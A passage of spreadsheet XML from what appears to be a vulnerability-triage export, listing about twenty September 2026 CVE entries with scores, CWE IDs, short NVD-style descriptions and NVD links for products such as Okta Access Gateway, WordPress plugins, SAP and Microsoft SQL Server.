t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1060" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1060" s="5" t="inlineStr" /><c r="H1060" s="5" t="n"><v>0.001</v></c><c r="I1060" s="5" t="inlineStr" /><c r="J1060" s="5" t="inlineStr" /><c r="K1060" s="5" t="inlineStr" /><c r="L1060" s="5" t="inlineStr" /><c r="M1060" s="5" t="inlineStr" /><c r="N1060" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1060" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1060" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1060" s="5" t="inlineStr" /><c r="R1060" s="5" t="inlineStr"><is><t>CWE-347</t></is></c><c r="S1060" s="5" t="inlineStr"><is><t>An issue in OpenDDS 3.33.x allows a local attacker to cause a denial of service via the verify function in the SIgnedDocument module</t></is></c><c r="T1060" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-52486</t></is></c></row><row r="1061"><c r="A1061" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1061" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1061" s="5" t="inlineStr"><is><t>CVE-2026-69469</t></is></c><c r="D1061" s="5" t="n"><v>6.6</v></c><c r="E1061" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1061" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1061" s="5" t="inlineStr" /><c r="H1061" s="5" t="n"><v>0.004</v></c><c r="I1061" s="5" t="inlineStr" /><c r="J1061" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1061"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61" s="5" t="inlineStr" /><c r="M1061" s="5" t="inlineStr" /><c r="N1061" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1061" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1061" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1061" s="5" t="inlineStr" /><c r="R1061" s="5" t="inlineStr"><is><t>CWE-122, CWE-190</t></is></c><c r="S1061" s="5" t="inlineStr"><is><t>Integer overflow or wraparound in Windows USB Audio Class driver (usbaudio.sys) allows an unauthorized attacker to elevate privileges with a physical attack.</t></is></c><c r="T1061" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69469</t></is></c></row><row r="1062"><c r="A1062" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1062" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1062" s="5" t="inlineStr"><is><t>CVE-2026-78545</t></is></c><c r="D1062" s="5" t="n"><v>6.6</v></c><c r="E1062" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1062" s="5" t="inlineStr"><is><t>psirt@okta.com</t></is></c><c r="G1062" s="5" t="inlineStr" /><c r="H1062" s="5" t="n"><v>0.004</v></c><c r="I1062" s="5" t="inlineStr" /><c r="J1062" s="5" t="inlineStr"><is><t>nginx, okta</t></is></c><c r="K1062" s="5" t="inlineStr" /><c r="L1062" s="5" t="inlineStr" /><c r="M1062" s="5" t="inlineStr" /><c r="N1062" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1062" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1062" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1062" s="5" t="inlineStr" /><c r="R1062" s="5" t="inlineStr"><is><t>CWE-94</t></is></c><c r="S1062" s="5" t="inlineStr"><is><t>The Okta Access Gateway does not sanitize the application label field before including it in the generated nginx configuration file. The unsanitized value is interpolated into an nginx server block directive, resulting in execution of injected directives.</t></is></c><c r="T1062" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78545</t></is></c></row><row r="1063"><c r="A1063" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1063" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1063" s="5" t="inlineStr"><is><t>CVE-2026-78550</t></is></c><c r="D1063" s="5" t="n"><v>6.6</v></c><c r="E1063" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1063" s="5" t="inlineStr"><is><t>psirt@okta.com</t></is></c><c r="G1063" s="5" t="inlineStr" /><c r="H1063" s="5" t="n"><v>0.004</v></c><c r="I1063" s="5" t="inlineStr" /><c r="J1063" s="5" t="inlineStr"><is><t>okta</t></is></c><c r="K1063" s="5" t="inlineStr" /><c r="L1063" s="5" t="inlineStr" /><c r="M1063" s="5" t="inlineStr" /><c r="N1063" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1063" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1063" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1063" s="5" t="inlineStr" /><c r="R1063" s="5" t="inlineStr"><is><t>CWE-95</t></is></c><c r="S1063" s="5" t="inlineStr"><is><t>The Okta Access Gateway management console passes user-supplied input to eval() without sanitization during an authenticated administrator SSH session. As a result, the unsanitized input is executed directly, leading to code execution with the privileges of the management console.</t></is></c><c r="T1063" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78550</t></is></c></row><row r="1064"><c r="A1064" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1064" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1064" s="5" t="inlineStr"><is><t>CVE-2026-17509</t></is></c><c r="D1064" s="5" t="n"><v>6.5</v></c><c r="E1064" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1064" s="5" t="inlineStr"><is><t>security@wordfence.com</t></is></c><c r="G1064" s="5" t="inlineStr" /><c r="H1064" s="5" t="n"><v>0.002</v></c><c r="I1064" s="5" t="inlineStr" /><c r="J1064" s="5" t="inlineStr" /><c r="K1064" s="5" t="inlineStr" /><c r="L1064" s="5" t="inlineStr" /><c r="M1064" s="5" t="inlineStr" /><c r="N1064" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1064" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1064" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1064" s="5" t="inlineStr" /><c r="R1064" s="5" t="inlineStr"><is><t>CWE-89</t></is></c><c r="S1064" s="5" t="inlineStr"><is><t>The WPML Multilingual CMS plugin for WordPress is vulnerable to time-based SQL Injection via the ‘elementIds’ parameter in all versions up to, and including, 4.9.5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vulnerability is exploitable due to an authorization bypass where the registered authorization callback fails to execute, allowing any authenticated user regardless of role to access administrative translation functionalities.</t></is></c><c r="T1064" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-17509</t></is></c></row><row r="1065"><c r="A1065" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1065" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1065" s="5" t="inlineStr"><is><t>CVE-2026-18021</t></is></c><c r="D1065" s="5" t="n"><v>6.5</v></c><c r="E1065" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1065" s="5" t="inlineStr"><is><t>security@wordfence.com</t></is></c><c r="G1065" s="5" t="inlineStr" /><c r="H1065" s="5" t="n"><v>0.003</v></c><c r="I1065" s="5" t="inlineStr" /><c r="J1065" s="5" t="inlineStr" /><c r="K1065" s="5" t="inlineStr" /><c r="L1065" s="5" t="inlineStr" /><c r="M1065" s="5" t="inlineStr" /><c r="N1065" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1065" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1065" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1065" s="5" t="inlineStr" /><c r="R1065" s="5" t="inlineStr"><is><t>CWE-94</t></is></c><c r="S1065" s="5" t="inlineStr"><is><t>The The Beaver Builder Page Builder – Drag and Drop Website Builder plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 2.10.3.1. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.</t></is></c><c r="T1065" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-18021</t></is></c></row><row r="1066"><c r="A1066" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1066" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1066" s="5" t="inlineStr"><is><t>CVE-2026-44766</t></is></c><c r="D1066" s="5" t="n"><v>6.5</v></c><c r="E1066" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1066" s="5" t="inlineStr"><is><t>cna@sap.com</t></is></c><c r="G1066" s="5" t="inlineStr" /><c r="H1066" s="5" t="n"><v>0.002</v></c><c r="I1066" s="5" t="inlineStr" /><c r="J1066" s="5" t="inlineStr"><is><t>sap</t></is></c><c r="K1066" s="5" t="inlineStr" /><c r="L1066" s="5" t="inlineStr" /><c r="M1066" s="5" t="inlineStr" /><c r="N1066" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1066" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1066" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1066" s="5" t="inlineStr" /><c r="R1066" s="5" t="inlineStr"><is><t>CWE-89</t></is></c><c r="S1066" s="5" t="inlineStr"><is><t>SAP S/4HANA (Intercompany Matching and Reconciliation) allows a low-privileged authenticated user to inject malicious input into certain functions, which may be processed by the database without proper validation. This could allow the user to access sensitive information, resulting in high impact on confidentiality, with no impact on integrity and availability of the application.</t></is></c><c r="T1066" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-44766</t></is></c></row><row r="1067"><c r="A1067" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1067" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1067" s="5" t="inlineStr"><is><t>CVE-2026-53637</t></is></c><c r="D1067" s="5" t="n"><v>6.5</v></c><c r="E1067" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1067" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G1067" s="5" t="inlineStr" /><c r="H1067" s="5" t="n"><v>0.003</v></c><c r="I1067" s="5" t="inlineStr" /><c r="J1067" s="5" t="inlineStr" /><c r="K1067" s="5" t="inlineStr" /><c r="L1067" s="5" t="inlineStr" /><c r="M1067" s="5" t="inlineStr" /><c r="N1067" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1067" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1067" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1067" s="5" t="inlineStr" /><c r="R1067" s="5" t="inlineStr"><is><t>CWE-672, CWE-841</t></is></c><c r="S1067" s="5" t="inlineStr"><is><t>Sylius is an Open Source eCommerce Framework on Symfony. Versions 2.0.0 through 2.0.17, 2.1.0 through 2.1.14, and 2.2.0 through 2.2.5 contain an improper workflow enforcement vulnerability in the cart `FormComponent`. When an order is completed while its cart page remains open, the stale LiveComponent does not detect the order’s changed state and continues to permit cart actions, allowing an authenticated customer to modify or permanently delete an already completed order. Versions 2.0.18, 2.1.15, and 2.2.6 contain a patch. As a workaround, deployments can copy the patched `FormComponent` into the application's `src/` directory and override the `sylius_shop.twig.component.cart.form` service definition to use that class.</t></is></c><c r="T1067" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-53637</t></is></c></row><row r="1068"><c r="A1068" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1068" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1068" s="5" t="inlineStr"><is><t>CVE-2026-55256</t></is></c><c r="D1068" s="5" t="n"><v>6.5</v></c><c r="E1068" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1068" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1068" s="5" t="inlineStr" /><c r="H1068" s="5" t="n"><v>0.003</v></c><c r="I1068" s="5" t="inlineStr" /><c r="J1068" s="5" t="inlineStr" /><c r="K1068" s="5" t="inlineStr" /><c r="L1068" s="5" t="inlineStr" /><c r="M1068" s="5" t="inlineStr" /><c r="N1068" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1068" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1068" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1068" s="5" t="inlineStr" /><c r="R1068" s="5" t="inlineStr"><is><t>CWE-20</t></is></c><c r="S1068" s="5" t="inlineStr"><is><t>In parsePartHeaders of multiple files, there is a possible persistent denial of service due to improper input validation. This could lead to remote denial of service with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T1068" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-55256</t></is></c></row><row r="1069"><c r="A1069" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1069" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1069" s="5" t="inlineStr"><is><t>CVE-2026-58649</t></is></c><c r="D1069" s="5" t="n"><v>6.5</v></c><c r="E1069" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1069" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1069" s="5" t="inlineStr" /><c r="H1069" s="5" t="n"><v>0.003</v></c><c r="I1069" s="5" t="inlineStr" /><c r="J1069" s="5" t="inlineStr" /><c r="K1069" s="5" t="inlineStr" /><c r="L1069" s="5" t="inlineStr" /><c r="M1069" s="5" t="inlineStr" /><c r="N1069" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1069" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1069" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1069" s="5" t="inlineStr" /><c r="R1069" s="5" t="inlineStr"><is><t>CWE-346</t></is></c><c r="S1069" s="5" t="inlineStr"><is><t>Origin validation error in .NET allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T1069" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-58649</t></is></c></row><row r="1070"><c r="A1070" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1070" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1070" s="5" t="inlineStr"><is><t>CVE-2026-62437</t></is></c><c r="D1070" s="5" t="n"><v>6.5</v></c><c r="E1070" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1070" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1070" s="5" t="inlineStr" /><c r="H1070" s="5" t="n"><v>0.001</v></c><c r="I1070" s="5" t="inlineStr" /><c r="J1070" s="5" t="inlineStr" /><c r="K1070" s="5" t="inlineStr" /><c r="L1070" s="5" t="inlineStr" /><c r="M1070" s="5" t="inlineStr" /><c r="N1070" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1070" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1070" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1070" s="5" t="inlineStr" /><c r="R1070" s="5" t="inlineStr"><is><t>CWE-362</t></is></c><c r="S1070" s="5" t="inlineStr"><is><t>When guests are terminated, various pieces of cleanup need carrying out.
The cleaning up of PCI devices which were assigned to guests, and the
associated removal of tracking structures for IRQs used by the devices
occurs relatively early in the process.  Unfortunately after that point
the guest about to be terminated could cause its device model (DM) to
re-establish such tracking structures, by having it bind one or more IRQs
anew.  While some of those tracking structures would still be cleaned up
later on, at least one would not be.</t></is></c><c r="T1070" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62437</t></is></c></row><row r="1071"><c r="A1071" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1071" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1071" s="5" t="inlineStr"><is><t>CVE-2026-62762</t></is></c><c r="D1071" s="5" t="n"><v>6.5</v></c><c r="E1071" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1071" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1071" s="5" t="inlineStr" /><c r="H1071" s="5" t="n"><v>0.008</v></c><c r="I1071" s="5" t="inlineStr" /><c r="J1071" s="5" t="inlineStr" /><c r="K1071" s="5" t="inlineStr" /><c r="L1071" s="5" t="inlineStr" /><c r="M1071" s="5" t="inlineStr" /><c r="N1071" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1071" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1071" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1071" s="5" t="inlineStr" /><c r="R1071" s="5" t="inlineStr"><is><t>CWE-476</t></is></c><c r="S1071" s="5" t="inlineStr"><is><t>Null pointer dereference in Active Directory Domain Services allows an authorized attacker to deny service over a network.</t></is></c><c r="T1071" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62762</t></is></c></row><row r="1072"><c r="A1072" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1072" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1072" s="5" t="inlineStr"><is><t>CVE-2026-62801</t></is></c><c r="D1072" s="5" t="n"><v>6.5</v></c><c r="E1072" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1072" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1072" s="5" t="inlineStr" /><c r="H1072" s="5" t="n"><v>0.005</v></c><c r="I1072" s="5" t="inlineStr" /><c r="J1072" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K107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72" s="5" t="inlineStr" /><c r="M1072" s="5" t="inlineStr" /><c r="N1072" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1072" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1072" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1072" s="5" t="inlineStr" /><c r="R1072" s="5" t="inlineStr"><is><t>CWE-22</t></is></c><c r="S1072" s="5" t="inlineStr"><is><t>Improper limitation of a pathname to a restricted directory ('path traversal') in Windows PowerShell allows an unauthorized attacker to bypass a security feature over a network.</t></is></c><c r="T1072" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62801</t></is></c></row><row r="1073"><c r="A1073" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1073" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1073" s="5" t="inlineStr"><is><t>CVE-2026-64918</t></is></c><c r="D1073" s="5" t="n"><v>6.5</v></c><c r="E1073" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1073" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1073" s="5" t="inlineStr" /><c r="H1073" s="5" t="n"><v>0.005</v></c><c r="I1073" s="5" t="inlineStr" /><c r="J1073" s="5" t="inlineStr" /><c r="K1073" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L1073" s="5" t="inlineStr" /><c r="M1073" s="5" t="inlineStr" /><c r="N1073" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1073" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1073" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1073" s="5" t="inlineStr" /><c r="R1073" s="5" t="inlineStr"><is><t>CWE-522</t></is></c><c r="S1073" s="5" t="inlineStr"><is><t>Insufficiently protected credentials in Microsoft Office allows an unauthorized attacker to perform spoofing over a network.</t></is></c><c r="T1073" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-64918</t></is></c></row><row r="1074"><c r="A1074" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1074" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1074" s="5" t="inlineStr"><is><t>CVE-2026-66303</t></is></c><c r="D1074" s="5" t="n"><v>6.5</v></c><c r="E1074" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1074" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1074" s="5" t="inlineStr" /><c r="H1074" s="5" t="n"><v>0.008</v></c><c r="I1074" s="5" t="inlineStr" /><c r="J1074" s="5" t="inlineStr" /><c r="K1074" s="5" t="inlineStr"><is><t>microsoft:skype_for_business_server, microsoft:skype_for_business_server_subscription_edition</t></is></c><c r="L1074" s="5" t="inlineStr" /><c r="M1074" s="5" t="inlineStr" /><c r="N1074" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1074" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1074" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1074" s="5" t="inlineStr" /><c r="R1074" s="5" t="inlineStr"><is><t>CWE-476</t></is></c><c r="S1074" s="5" t="inlineStr"><is><t>Null pointer dereference in Skype for Business allows an authorized attacker to deny service over a network.</t></is></c><c r="T1074" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-66303</t></is></c></row><row r="1075"><c r="A1075" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1075" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1075" s="5" t="inlineStr"><is><t>CVE-2026-66306</t></is></c><c r="D1075" s="5" t="n"><v>6.5</v></c><c r="E1075" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1075" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1075" s="5" t="inlineStr" /><c r="H1075" s="5" t="n"><v>0.005</v></c><c r="I1075" s="5" t="inlineStr" /><c r="J1075" s="5" t="inlineStr" /><c r="K1075" s="5" t="inlineStr"><is><t>microsoft:skype_for_business_server, microsoft:skype_for_business_server_subscription_edition</t></is></c><c r="L1075" s="5" t="inlineStr" /><c r="M1075" s="5" t="inlineStr" /><c r="N1075" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1075" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1075" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1075" s="5" t="inlineStr" /><c r="R1075" s="5" t="inlineStr"><is><t>CWE-209</t></is></c><c r="S1075" s="5" t="inlineStr"><is><t>Generation of error message containing sensitive information in Skype for Business allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T1075" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-66306</t></is></c></row><row r="1076"><c r="A1076" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1076" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1076" s="5" t="inlineStr"><is><t>CVE-2026-66308</t></is></c><c r="D1076" s="5" t="n"><v>6.5</v></c><c r="E1076" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1076" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1076" s="5" t="inlineStr" /><c r="H1076" s="5" t="n"><v>0.006</v></c><c r="I1076" s="5" t="inlineStr" /><c r="J1076" s="5" t="inlineStr" /><c r="K1076" s="5" t="inlineStr"><is><t>microsoft:skype_for_business_server, microsoft:skype_for_business_server_subscription_edition</t></is></c><c r="L1076" s="5" t="inlineStr" /><c r="M1076" s="5" t="inlineStr" /><c r="N1076" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1076" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1076" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1076" s="5" t="inlineStr" /><c r="R1076" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1076" s="5" t="inlineStr"><is><t>Out-of-bounds read in Skype for Business allows an authorized attacker to deny service over a network.</t></is></c><c r="T1076" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-66308</t></is></c></row><row r="1077"><c r="A1077" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1077" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1077" s="5" t="inlineStr"><is><t>CVE-2026-66816</t></is></c><c r="D1077" s="5" t="n"><v>6.5</v></c><c r="E1077" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1077" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1077" s="5" t="inlineStr" /><c r="H1077" s="5" t="n"><v>0.007</v></c><c r="I1077" s="5" t="inlineStr" /><c r="J1077" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K1077" s="5" t="inlineStr"><is><t>microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L1077" s="5" t="inlineStr" /><c r="M1077" s="5" t="inlineStr" /><c r="N1077" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1077" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1077" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1077" s="5" t="inlineStr" /><c r="R1077" s="5" t="inlineStr"><is><t>CWE-778</t></is></c><c r="S1077" s="5" t="inlineStr"><is><t>Insufficient logging in SQL Server allows an authorized attacker to bypass a security feature over a network.</t></is></c><c r="T1077" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-66816</t></is></c></row><row r="1078"><c r="A1078" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1078" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1078" s="5" t="inlineStr"><is><t>CVE-2026-67369</t></is></c><c r="D1078" s="5" t="n"><v>6.5</v></c><c r="E1078" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1078" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1078" s="5" t="inlineStr" /><c r="H1078" s="5" t="n"><v>0.007</v></c><c r="I1078" s="5" t="inlineStr" /><c r="J1078" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K1078" s="5" t="inlineStr"><is><t>microsoft:sql_server_2025</t></is></c><c r="L1078" s="5" t="inlineStr" /><c r="M1078" s="5" t="inlineStr" /><c r="N1078" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1078" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1078" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1078" s="5" t="inlineStr" /><c r="R1078" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1078" s="5" t="inlineStr"><is><t>Out-of-bounds read in SQL Server allows an authorized attacker to disclose information over a network.</t></is></c><c r="T1078" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67369</t></is></c></row><row r="1079"><c r="A1079" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1079" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1079" s="5" t="inlineStr"><is><t>CVE-2026-67383</t></is></c><c r="D1079" s="5" t="n"><v>6.5</v></c><c r="E1079" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1079" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1079" s="5" t="inlineStr" /><c r="H1079" s="5" t="n"><v>0.01</v></c><c r="I1079" s="5" t="inlineStr" /><c r="J1079" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K1079" s="5" t="inlineStr"><is><t>microsoft:sql_server_2025</t></is></c><c r="L1079" s="5" t="inlineStr" /><c r="M1079" s="5" t="inlineStr" /><c r="N1079" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1079" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1079" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1079" s="5" t="inlineStr" /><c r="R1079" s="5" t="inlineStr"><is><t>CWE-209</t></is></c><c r="S1079" s="5" t="inlineStr"><is><t>Generation of error message containing sensitive information in SQL Server allows an authorized attacker to disclose information over a network.</t></is></c><c r="T1079" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67383</t></is></c></row><row r="1080"><c r="A1080" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1080" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1080" s="5" t="inlineStr"><is><t>CVE-2026-67386</t></is></c><c r="D1080" s="5" t="n"><v>6.5</v></c><c r="E1080" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1080" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1080" s="5" t="inlineStr" /><c r="H1080" s="5" t="n"><v>0.007</v></c><c r="I1080" s="5" t="inlineStr" /><c r="J1080" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K1080" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L1080" s="5" t="inlineStr" /><c r="M1080" s="5" t="inlineStr" /><c r="N1080" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1080" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1080" s="5" 